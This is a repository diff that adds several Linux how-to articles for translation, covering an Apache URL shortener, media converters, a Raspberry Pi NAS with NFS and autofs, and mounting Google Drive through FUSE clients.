The first line simply enables the rewrite engine. The second line builds a map of the short links from a text file. The path above is only an example; you will need to use a valid path on your system (make sure it's readable by the user account that runs HTTPD). The last line rewrites the URL. In this example, it takes any characters and looks them up in the rewrite map. You may want to have your rewrites use a particular string at the beginning. For example, if you wanted all your shortened links to be of the form "slX" (where X is a number), you would replace `(.+)` above with `(sl\d+)`.
|
||||||
|
|
||||||
|
I used a temporary (HTTP 302) redirect here. This allows me to update the destination URL later. If you want the short link to always point to the same target, you can use a permanent (HTTP 301) redirect instead. Replace `temp` on line three with `permanent`.
|
||||||
|
|
||||||
|
### Build your map
|
||||||
|
|
||||||
|
Edit the file you specified on the `RewriteMap` line of the configuration. The format is a space-separated key-value store. Put one link on each line:
|
||||||
|
```
|
||||||
|
osdc https://opensource.com/users/bcotton
|
||||||
|
|
||||||
|
twitter https://twitter.com/funnelfiasco
|
||||||
|
|
||||||
|
swody1 https://www.spc.noaa.gov/products/outlook/day1otlk.html
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Restart HTTPD
|
||||||
|
|
||||||
|
The last step is to restart the HTTPD process. This is done with `systemctl restart httpd` or similar (the command and daemon name may differ by distribution). Your link shortener is now up and running. When you're ready to edit your map, you don't need to restart the web server. All you have to do is save the file, and the web server will pick up the differences.
|
||||||
|
|
||||||
|
### Future work
|
||||||
|
|
||||||
|
This example gives you a basic URL shortener. It can serve as a good starting point if you want to develop your own management interface as a learning project. Or you can just use it to share memorable links to forgettable URLs.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/apache-url-shortener
|
||||||
|
|
||||||
|
作者:[Ben Cotton][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/bcotton
|
||||||
|
[1]:http://t.co
|
||||||
|
[2]:http://bit.ly/INtravel
|
||||||
|
[3]:https://opensource.com/article/17/3/url-link-shortener
|
||||||
|
[4]:https://opensource.com/article/18/2/how-configure-apache-web-server
|
||||||
|
[5]:http://funnelfiasco.com
|
||||||
|
[6]:http://funnelfias.co
|
||||||
|
[7]:https://opensource.com/article/18/3/configuring-multiple-web-sites-apache
|
@ -0,0 +1,71 @@
|
|||||||
|
4 open source media conversion tools for the Linux desktop
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_newmedia.png?itok=imgehG2v)
|
||||||
|
|
||||||
|
Ah, so many file formats—especially audio and video ones—can make for fun times if you get a file with an extension you don't recognize, if your media player doesn't play a file in that format, or if you want to use an open format.
|
||||||
|
|
||||||
|
So, what can a Linux user do? Turn to one of the many open source media conversion tools for the Linux desktop, of course. Let's take a look at four of them.
|
||||||
|
|
||||||
|
### Gnac
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/gnac.png)
|
||||||
|
|
||||||
|
[Gnac][1] is one of my favorite audio converters and has been for years. It's easy to use, it's powerful, and it does one thing well—as any top-notch utility should.
|
||||||
|
|
||||||
|
How easy? You click a toolbar button to add one or more files to convert, choose a format to convert to, and then click **Convert**. The conversions are quick, and they're clean.
|
||||||
|
|
||||||
|
How powerful? Gnac can handle all the audio formats that the [GStreamer][2] multimedia framework supports. Out of the box, you can convert between Ogg, FLAC, AAC, MP3, WAV, and SPX. You can also change the conversion options for each format or add new ones.
|
||||||
|
|
||||||
|
### SoundConverter
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/soundconverter.png)
|
||||||
|
|
||||||
|
If simplicity with a few extra features is your thing, then give [SoundConverter][3] a look. As its name states, SoundConverter works its magic only on audio files. Like Gnac, it can read the formats that GStreamer supports, and it can spit out Ogg Vorbis, MP3, FLAC, WAV, AAC, and Opus files.
|
||||||
|
|
||||||
|
Load individual files or an entire folder by either clicking **Add File** or dragging and dropping it into the SoundConverter window. Click **Convert** , and the software powers through the conversion. It's fast, too—I've converted a folder containing a couple dozen files in about a minute.
|
||||||
|
|
||||||
|
SoundConverter has options for setting the quality of your converted files. You can change the way files are named (for example, include a track number or album name in the title) and create subfolders for the converted files.
|
||||||
|
|
||||||
|
### WinFF
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/winff.png)
|
||||||
|
|
||||||
|
[WinFF][4], on its own, isn't a converter. It's a graphical frontend to FFmpeg, which [Tim Nugent looked at][5] for Opensource.com. While WinFF doesn't have all the flexibility of FFmpeg, it makes FFmpeg easier to use and gets the job done quickly and fairly easily.
|
||||||
|
|
||||||
|
Although it's not the prettiest application out there, WinFF doesn't need to be. It's more than usable. You can choose what formats to convert to from a dropdown list and select several presets. On top of that, you can specify options like bitrates and frame rates, the number of audio channels to use, and even the size at which to crop videos.
|
||||||
|
|
||||||
|
The conversions, especially video, take a bit of time, but the results are generally quite good. Once in a while, the conversion gets a bit mangled—but not often enough to be a concern. And, as I said earlier, using WinFF can save me a bit of time.
|
||||||
|
|
||||||
|
### Miro Video Converter
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/miro-main-window.png)
|
||||||
|
|
||||||
|
Not all video files are created equally. Some are in proprietary formats. Others look great on a monitor or TV screen but aren't optimized for a mobile device. That's where [Miro Video Converter][6] comes to the rescue.
|
||||||
|
|
||||||
|
Miro Video Converter has a heavy emphasis on mobile. It can convert video that you can play on Android phones, Apple devices, the PlayStation Portable, and the Kindle Fire. It will convert most common video formats to MP4, [WebM][7] , and [Ogg Theora][8] . You can find a full list of supported devices and formats [on Miro's website][6]
|
||||||
|
|
||||||
|
To use it, either drag and drop a file into the window or select the file that you want to convert. Then, click the Format menu to choose the format for the conversion. You can also click the Apple, Android, or Other menus to choose a device for which you want to convert the file. Miro Video Converter resizes the video for the device's screen resolution.
|
||||||
|
|
||||||
|
Do you have a favorite Linux media conversion application? Feel free to share it by leaving a comment.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/media-conversion-tools-linux
|
||||||
|
|
||||||
|
作者:[Scott Nesbitt][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/scottnesbitt
|
||||||
|
[1]:http://gnac.sourceforge.net
|
||||||
|
[2]:http://www.gstreamer.net/
|
||||||
|
[3]:http://soundconverter.org/
|
||||||
|
[4]:https://www.biggmatt.com/winff/
|
||||||
|
[5]:https://opensource.com/article/17/6/ffmpeg-convert-media-file-formats
|
||||||
|
[6]:http://www.mirovideoconverter.com/
|
||||||
|
[7]:https://en.wikipedia.org/wiki/WebM
|
||||||
|
[8]:https://en.wikipedia.org/wiki/Ogg_theora
|
@ -0,0 +1,284 @@
|
|||||||
|
Building a network attached storage device with a Raspberry Pi
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus-storage.png?itok=95-zvHYl)
|
||||||
|
|
||||||
|
In this three-part series, I'll explain how to set up a simple, useful NAS (network attached storage) system. I use this kind of setup to store my files on a central system, creating incremental backups automatically every night. To mount the disk on devices that are located in the same network, NFS is installed. To access files offline and share them with friends, I use [Nextcloud][1].
|
||||||
|
|
||||||
|
This article will cover the basic setup of software and hardware to mount the data disk on a remote device. In the second article, I will discuss a backup strategy and set up a cron job to create daily backups. In the third and last article, we will install Nextcloud, a tool for easy file access to devices synced offline as well as online using a web interface. It supports multiple users and public file-sharing so you can share pictures with friends, for example, by sending a password-protected link.
|
||||||
|
|
||||||
|
The target architecture of our system looks like this:
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/nas_part1.png)
|
||||||
|
|
||||||
|
### Hardware
|
||||||
|
|
||||||
|
Let's get started with the hardware you need. You might come up with a different shopping list, so consider this one an example.
|
||||||
|
|
||||||
|
The computing power is delivered by a [Raspberry Pi 3][2], which comes with a quad-core CPU, a gigabyte of RAM, and (somewhat) fast ethernet. Data will be stored on two USB hard drives (I use 1-TB disks); one is used for the everyday traffic, the other is used to store backups. Be sure to use either active USB hard drives or a USB hub with an additional power supply, as the Raspberry Pi will not be able to power two USB drives.
|
||||||
|
|
||||||
|
### Software
|
||||||
|
|
||||||
|
The operating system with the highest visibility in the community is [Raspbian][3] , which is excellent for custom projects. There are plenty of [guides][4] that explain how to install Raspbian on a Raspberry Pi, so I won't go into details here. The latest official supported version at the time of this writing is [Raspbian Stretch][5] , which worked fine for me.
|
||||||
|
|
||||||
|
At this point, I will assume you have configured your basic Raspbian and are able to connect to the Raspberry Pi by `ssh`.
|
||||||
|
|
||||||
|
### Prepare the USB drives
|
||||||
|
|
||||||
|
To achieve good performance reading from and writing to the USB hard drives, I recommend formatting them with ext4. To do so, you must first find out which disks are attached to the Raspberry Pi. You can find the disk devices in `/dev/sd/<x>`. Using the command `fdisk -l`, you can find out which two USB drives you just attached. Please note that all data on the USB drives will be lost as soon as you follow these steps.
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo fdisk -l
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<...>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
|
||||||
|
|
||||||
|
Units: sectors of 1 * 512 = 512 bytes
|
||||||
|
|
||||||
|
Sector size (logical/physical): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
I/O size (minimum/optimal): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
Disklabel type: dos
|
||||||
|
|
||||||
|
Disk identifier: 0xe8900690
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Device Boot Start End Sectors Size Id Type
|
||||||
|
|
||||||
|
/dev/sda1 2048 1953525167 1953523120 931.5G 83 Linux
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disk /dev/sdb: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
|
||||||
|
|
||||||
|
Units: sectors of 1 * 512 = 512 bytes
|
||||||
|
|
||||||
|
Sector size (logical/physical): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
I/O size (minimum/optimal): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
Disklabel type: dos
|
||||||
|
|
||||||
|
Disk identifier: 0x6aa4f598
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Device Boot Start End Sectors Size Id Type
|
||||||
|
|
||||||
|
/dev/sdb1 * 2048 1953521663 1953519616 931.5G 83 Linux
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
As those devices are the only 1TB disks attached to the Raspberry Pi, we can easily see that `/dev/sda` and `/dev/sdb` are the two USB drives. The partition table at the end of each disk shows how it should look after the following steps, which create the partition table and format the disks. To do this, repeat the following steps for each of the two devices by replacing `sda` with `sdb` the second time (assuming your devices are also listed as `/dev/sda` and `/dev/sdb` in `fdisk`).
|
||||||
|
|
||||||
|
First, delete the partition table of the disk and create a new one containing only one partition. In `fdisk`, you can use interactive one-letter commands to tell the program what to do. Simply insert them after the prompt `Command (m for help):` as follows (you can also use the `m` command anytime to get more information):
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo fdisk /dev/sda
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Welcome to fdisk (util-linux 2.29.2).
|
||||||
|
|
||||||
|
Changes will remain in memory only, until you decide to write them.
|
||||||
|
|
||||||
|
Be careful before using the write command.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Command (m for help): o
|
||||||
|
|
||||||
|
Created a new DOS disklabel with disk identifier 0x9c310964.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Command (m for help): n
|
||||||
|
|
||||||
|
Partition type
|
||||||
|
|
||||||
|
p primary (0 primary, 0 extended, 4 free)
|
||||||
|
|
||||||
|
e extended (container for logical partitions)
|
||||||
|
|
||||||
|
Select (default p): p
|
||||||
|
|
||||||
|
Partition number (1-4, default 1):
|
||||||
|
|
||||||
|
First sector (2048-1953525167, default 2048):
|
||||||
|
|
||||||
|
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Created a new partition 1 of type 'Linux' and of size 931.5 GiB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Command (m for help): p
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
|
||||||
|
|
||||||
|
Units: sectors of 1 * 512 = 512 bytes
|
||||||
|
|
||||||
|
Sector size (logical/physical): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
I/O size (minimum/optimal): 512 bytes / 512 bytes
|
||||||
|
|
||||||
|
Disklabel type: dos
|
||||||
|
|
||||||
|
Disk identifier: 0x9c310964
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Device Boot Start End Sectors Size Id Type
|
||||||
|
|
||||||
|
/dev/sda1 2048 1953525167 1953523120 931.5G 83 Linux
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Command (m for help): w
|
||||||
|
|
||||||
|
The partition table has been altered.
|
||||||
|
|
||||||
|
Syncing disks.
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Now we will format the newly created partition `/dev/sda1` using the ext4 filesystem:
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo mkfs.ext4 /dev/sda1
|
||||||
|
|
||||||
|
mke2fs 1.43.4 (31-Jan-2017)
|
||||||
|
|
||||||
|
Discarding device blocks: done
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<...>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Allocating group tables: done
|
||||||
|
|
||||||
|
Writing inode tables: done
|
||||||
|
|
||||||
|
Creating journal (1024 blocks): done
|
||||||
|
|
||||||
|
Writing superblocks and filesystem accounting information: done
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
After repeating the above steps, let's label the new partitions according to their usage in your system:
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo e2label /dev/sda1 data
|
||||||
|
|
||||||
|
pi@raspberrypi:~ $ sudo e2label /dev/sdb1 backup
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Now let's get those disks mounted to store some data. My experience, based on running this setup for over a year now, is that USB drives are not always available to get mounted when the Raspberry Pi boots up (for example, after a power outage), so I recommend using autofs to mount them when needed.
|
||||||
|
|
||||||
|
First install autofs and create the mount point for the storage:
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo apt install autofs
|
||||||
|
|
||||||
|
pi@raspberrypi:~ $ sudo mkdir /nas
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Then mount the devices by adding the following line to `/etc/auto.master`:
|
||||||
|
```
|
||||||
|
/nas /etc/auto.usb
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Create the file `/etc/auto.usb` if not existing with the following content, and restart the autofs service:
|
||||||
|
```
|
||||||
|
data -fstype=ext4,rw :/dev/disk/by-label/data
|
||||||
|
|
||||||
|
backup -fstype=ext4,rw :/dev/disk/by-label/backup
|
||||||
|
|
||||||
|
pi@raspberrypi3:~ $ sudo service autofs restart
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Now you should be able to access the disks at `/nas/data` and `/nas/backup`, respectively. Clearly, the content will not be too thrilling, as you just erased all the data from the disks. Nevertheless, you should be able to verify the devices are mounted by executing the following commands:
|
||||||
|
```
|
||||||
|
pi@raspberrypi3:~ $ cd /nas/data
|
||||||
|
|
||||||
|
pi@raspberrypi3:/nas/data $ cd /nas/backup
|
||||||
|
|
||||||
|
pi@raspberrypi3:/nas/backup $ mount
|
||||||
|
|
||||||
|
<...>
|
||||||
|
|
||||||
|
/etc/auto.usb on /nas type autofs (rw,relatime,fd=6,pgrp=463,timeout=300,minproto=5,maxproto=5,indirect)
|
||||||
|
|
||||||
|
<...>
|
||||||
|
|
||||||
|
/dev/sda1 on /nas/data type ext4 (rw,relatime,data=ordered)
|
||||||
|
|
||||||
|
/dev/sdb1 on /nas/backup type ext4 (rw,relatime,data=ordered)
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
First move into the directories to make sure autofs mounts the devices. Autofs tracks access to the filesystems and mounts the needed devices on the go. Then the `mount` command shows that the two devices are actually mounted where we wanted them.
|
||||||
|
|
||||||
|
Setting up autofs is a bit fault-prone, so do not get frustrated if mounting doesn't work on the first try. Give it another chance, search for more detailed resources (there is plenty of documentation online), or leave a comment.
|
||||||
|
|
||||||
|
### Mount network storage
|
||||||
|
|
||||||
|
Now that you have set up the basic network storage, we want it to be mounted on a remote Linux machine. We will use the network file system (NFS) for this. First, install the NFS server on the Raspberry Pi:
|
||||||
|
```
|
||||||
|
pi@raspberrypi:~ $ sudo apt install nfs-kernel-server
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Next we need to tell the NFS server to expose the `/nas/data` directory, which will be the only device accessible from outside the Raspberry Pi (the other one will be used for backups only). To export the directory, edit the file `/etc/exports` and add the following line to allow all devices with access to the NAS to mount your storage:
|
||||||
|
```
|
||||||
|
/nas/data *(rw,sync,no_subtree_check)
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
For more information about restricting the mount to single devices and so on, refer to `man exports`. In the configuration above, anyone will be able to mount your data as long as they have access to the ports needed by NFS: `111` and `2049`. I use the configuration above and allow access to my home network only for ports 22 and 443 using the routers firewall. That way, only devices in the home network can reach the NFS server.
|
||||||
|
|
||||||
|
To mount the storage on a Linux computer, run the commands:
|
||||||
|
```
|
||||||
|
you@desktop:~ $ sudo mkdir /nas/data
|
||||||
|
|
||||||
|
you@desktop:~ $ sudo mount -t nfs <raspberry-pi-hostname-or-ip>:/nas/data /nas/data
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Again, I recommend using autofs to mount this network device. For extra help, check out [How to use autofs to mount NFS shares][6].
|
||||||
|
|
||||||
|
Now you are able to access files stored on your own RaspberryPi-powered NAS from remote devices using the NFS mount. In the next part of this series, I will cover how to automatically back up your data to the second hard drive using `rsync`. To save space on the device while still doing daily backups, you will learn how to create incremental backups with `rsync`.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/network-attached-storage-Raspberry-Pi
|
||||||
|
|
||||||
|
作者:[Manuel Dewald][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/ntlx
|
||||||
|
[1]:https://nextcloud.com/
|
||||||
|
[2]:https://www.raspberrypi.org/products/raspberry-pi-3-model-b/
|
||||||
|
[3]:https://www.raspbian.org/
|
||||||
|
[4]:https://www.raspberrypi.org/documentation/installation/installing-images/
|
||||||
|
[5]:https://www.raspberrypi.org/blog/raspbian-stretch/
|
||||||
|
[6]:https://opensource.com/article/18/6/using-autofs-mount-nfs-shares
|
@ -0,0 +1,265 @@
|
|||||||
|
How To Mount Google Drive Locally As Virtual File System In Linux
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://www.ostechnix.com/wp-content/uploads/2018/07/Google-Drive-720x340.png)
|
||||||
|
|
||||||
|
[**Google Drive**][1] is the one of the popular cloud storage provider on the planet. As of 2017, over 800 million users are actively using this service worldwide. Even though the number of users have dramatically increased, Google haven’t released a Google drive client for Linux yet. But it didn’t stop the Linux community. Every now and then, some developers had brought few google drive clients for Linux operating system. In this guide, we will see three unofficial google drive clients for Linux. Using these clients, you can mount Google drive locally as a virtual file system and access your drive files in your Linux box. Read on.
|
||||||
|
|
||||||
|
### 1. Google-drive-ocamlfuse
|
||||||
|
|
||||||
|
The **google-drive-ocamlfuse** is a FUSE filesystem for Google Drive, written in OCaml. For those wondering, FUSE, stands for **F** ilesystem in **Use** rspace, is a project that allows the users to create virtual file systems in user level. **google-drive-ocamlfuse** allows you to mount your Google Drive on Linux system. It features read/write access to ordinary files and folders, read-only access to Google docks, sheets, and slides, support for multiple google drive accounts, duplicate file handling, access to your drive trash directory, and more.
|
||||||
|
|
||||||
|
#### Installing google-drive-ocamlfuse
|
||||||
|
|
||||||
|
google-drive-ocamlfuse is available in the [**AUR**][2], so you can install it using any AUR helper programs, for example [**Yay**][3].
|
||||||
|
```
|
||||||
|
$ yay -S google-drive-ocamlfuse
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
On Ubuntu:
|
||||||
|
```
|
||||||
|
$ sudo add-apt-repository ppa:alessandro-strada/ppa
|
||||||
|
$ sudo apt-get update
|
||||||
|
$ sudo apt-get install google-drive-ocamlfuse
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
To install latest beta version, do:
|
||||||
|
```
|
||||||
|
$ sudo add-apt-repository ppa:alessandro-strada/google-drive-ocamlfuse-beta
|
||||||
|
$ sudo apt-get update
|
||||||
|
$ sudo apt-get install google-drive-ocamlfuse
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Usage
|
||||||
|
|
||||||
|
Once installed, run the following command to launch **google-drive-ocamlfuse** utility from your Terminal:
|
||||||
|
```
|
||||||
|
$ google-drive-ocamlfuse
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
When you run this first time, the utility will open your web browser and ask your permission to authorize your google drive files. Once you gave authorization, all necessary config files and folders it needs to mount your google drive will be automatically created.
|
||||||
|
|
||||||
|
![][5]
|
||||||
|
|
||||||
|
After successful authentication, you will see the following message in your Terminal.
|
||||||
|
```
|
||||||
|
Access token retrieved correctly.
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
You’re good to go now. Close the web browser and then create a mount point to mount your google drive files.
|
||||||
|
```
|
||||||
|
$ mkdir ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Finally, mount your google drive using command:
|
||||||
|
```
|
||||||
|
$ google-drive-ocamlfuse ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Congratulations! You can access access your files either from Terminal or file manager.
|
||||||
|
|
||||||
|
From **Terminal** :
|
||||||
|
```
|
||||||
|
$ ls ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
From **File manager** :
|
||||||
|
|
||||||
|
![][6]
|
||||||
|
|
||||||
|
If you have more than one account, use **label** option to distinguish different accounts like below.
|
||||||
|
```
|
||||||
|
$ google-drive-ocamlfuse -label label [mountpoint]
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Once you’re done, unmount the FUSE flesystem using command:
|
||||||
|
```
|
||||||
|
$ fusermount -u ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
For more details, refer man pages.
|
||||||
|
```
|
||||||
|
$ google-drive-ocamlfuse --help
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Also, do check the [**official wiki**][7] and the [**project GitHub repository**][8] for more details.
|
||||||
|
|
||||||
|
### 2. GCSF
|
||||||
|
|
||||||
|
**GCSF** is a FUSE filesystem based on Google Drive, written using **Rust** programming language. The name GCSF has come from the Romanian word “ **G** oogle **C** onduce **S** istem de **F** ișiere”, which means “Google Drive Filesystem” in English. Using GCSF, you can mount your Google drive as a local virtual file system and access the contents from the Terminal or file manager. You might wonder how it differ from other Google Drive FUSE projects, for example **google-drive-ocamlfuse**. The developer of GCSF replied to a similar [comment on Reddit][9] “GCSF tends to be faster in several cases (listing files recursively, reading large files from Drive). The caching strategy it uses also leads to very fast reads (x4-7 improvement compared to google-drive-ocamlfuse) for files that have been cached, at the cost of using more RAM“.
|
||||||
|
|
||||||
|
#### Installing GCSF
|
||||||
|
|
||||||
|
GCSF is available in the [**AUR**][10], so the Arch Linux users can install it using any AUR helper, for example [**Yay**][3].
|
||||||
|
```
|
||||||
|
$ yay -S gcsf-git
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
For other distributions, do the following.
|
||||||
|
|
||||||
|
Make sure you have installed Rust on your system.
|
||||||
|
|
||||||
|
Make sure **pkg-config** and the **fuse** packages are installed. They are available in the default repositories of most Linux distributions. For example, on Ubuntu and derivatives, you can install them using command:
|
||||||
|
```
|
||||||
|
$ sudo apt-get install -y libfuse-dev pkg-config
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Once all dependencies installed, run the following command to install GCSF:
|
||||||
|
```
|
||||||
|
$ cargo install gcsf
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Usage
|
||||||
|
|
||||||
|
First, we need to authorize our google drive. To do so, simply run:
|
||||||
|
```
|
||||||
|
$ gcsf login ostechnix
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
You must specify a session name. Replace **ostechnix** with your own session name. You will see an output something like below with an URL to authorize your google drive account.
|
||||||
|
|
||||||
|
![][11]
|
||||||
|
|
||||||
|
Just copy and navigate to the above URL from your browser and click **allow** to give permission to access your google drive contents. Once you gave the authentication you will see an output like below.
|
||||||
|
```
|
||||||
|
Successfully logged in. Credentials saved to "/home/sk/.config/gcsf/ostechnix".
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
GCSF will create a configuration file in **$XDG_CONFIG_HOME/gcsf/gcsf.toml** , which is usually defined as **$HOME/.config/gcsf/gcsf.toml**. Credentials are stored in the same directory.
|
||||||
|
|
||||||
|
Next, create a directory to mount your google drive contents.
|
||||||
|
```
|
||||||
|
$ mkdir ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, edit **/etc/fuse.conf** file:
|
||||||
|
```
|
||||||
|
$ sudo vi /etc/fuse.conf
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Uncomment the following line to allow non-root users to specify the allow_other or allow_root mount options.
|
||||||
|
```
|
||||||
|
user_allow_other
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Save and close the file.
|
||||||
|
|
||||||
|
Finally, mount your google drive using command:
|
||||||
|
```
|
||||||
|
$ gcsf mount ~/mygoogledrive -s ostechnix
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Sample output:
|
||||||
|
```
|
||||||
|
INFO gcsf > Creating and populating file system...
|
||||||
|
INFO gcsf > File sytem created.
|
||||||
|
INFO gcsf > Mounting to /home/sk/mygoogledrive
|
||||||
|
INFO gcsf > Mounted to /home/sk/mygoogledrive
|
||||||
|
INFO gcsf::gcsf::file_manager > Checking for changes and possibly applying them.
|
||||||
|
INFO gcsf::gcsf::file_manager > Checking for changes and possibly applying them.
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Again, replace **ostechnix** with your session name. You can view the existing sessions using command:
|
||||||
|
```
|
||||||
|
$ gcsf list
|
||||||
|
Sessions:
|
||||||
|
- ostechnix
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
You can now access your google drive contents either from the Terminal or from File manager.
|
||||||
|
|
||||||
|
From **Terminal** :
|
||||||
|
```
|
||||||
|
$ ls ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
From **File manager** :
|
||||||
|
|
||||||
|
![][12]
|
||||||
|
|
||||||
|
If you don’t know where your Google drive is mounted, use **df** or **mount** command as shown below.
|
||||||
|
```
|
||||||
|
$ df -h
|
||||||
|
Filesystem Size Used Avail Use% Mounted on
|
||||||
|
udev 968M 0 968M 0% /dev
|
||||||
|
tmpfs 200M 1.6M 198M 1% /run
|
||||||
|
/dev/sda1 20G 7.5G 12G 41% /
|
||||||
|
tmpfs 997M 0 997M 0% /dev/shm
|
||||||
|
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
|
||||||
|
tmpfs 997M 0 997M 0% /sys/fs/cgroup
|
||||||
|
tmpfs 200M 40K 200M 1% /run/user/1000
|
||||||
|
GCSF 15G 857M 15G 6% /home/sk/mygoogledrive
|
||||||
|
|
||||||
|
$ mount | grep GCSF
|
||||||
|
GCSF on /home/sk/mygoogledrive type fuse (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000,allow_other)
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Once done, unmount the google drive using command:
|
||||||
|
```
|
||||||
|
$ fusermount -u ~/mygoogledrive
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Check the [**GCSF GitHub repository**][13] for more details.
|
||||||
|
|
||||||
|
### 3. Tuxdrive
|
||||||
|
|
||||||
|
**Tuxdrive** is yet another unofficial google drive client for Linux. We have written a detailed guide about Tuxdrive a while ago. Please check the following link.
|
||||||
|
|
||||||
|
Of course, there were few other unofficial google drive clients available in the past, such as Grive2, Syncdrive. But it seems that they are discontinued now. I will keep updating this list when I come across any active google drive clients.
|
||||||
|
|
||||||
|
